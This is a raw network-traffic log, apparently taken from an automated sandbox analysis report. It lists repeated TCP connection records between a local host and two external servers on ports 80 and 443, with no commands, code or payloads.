                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 198.12.81.228:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.12.81.228:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 88.99.66.38:443 -> 192.168.2.22:49168
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49169
                  Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 198.12.81.228:80 -> 192.168.2.22:49170
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 198.12.81.228:80
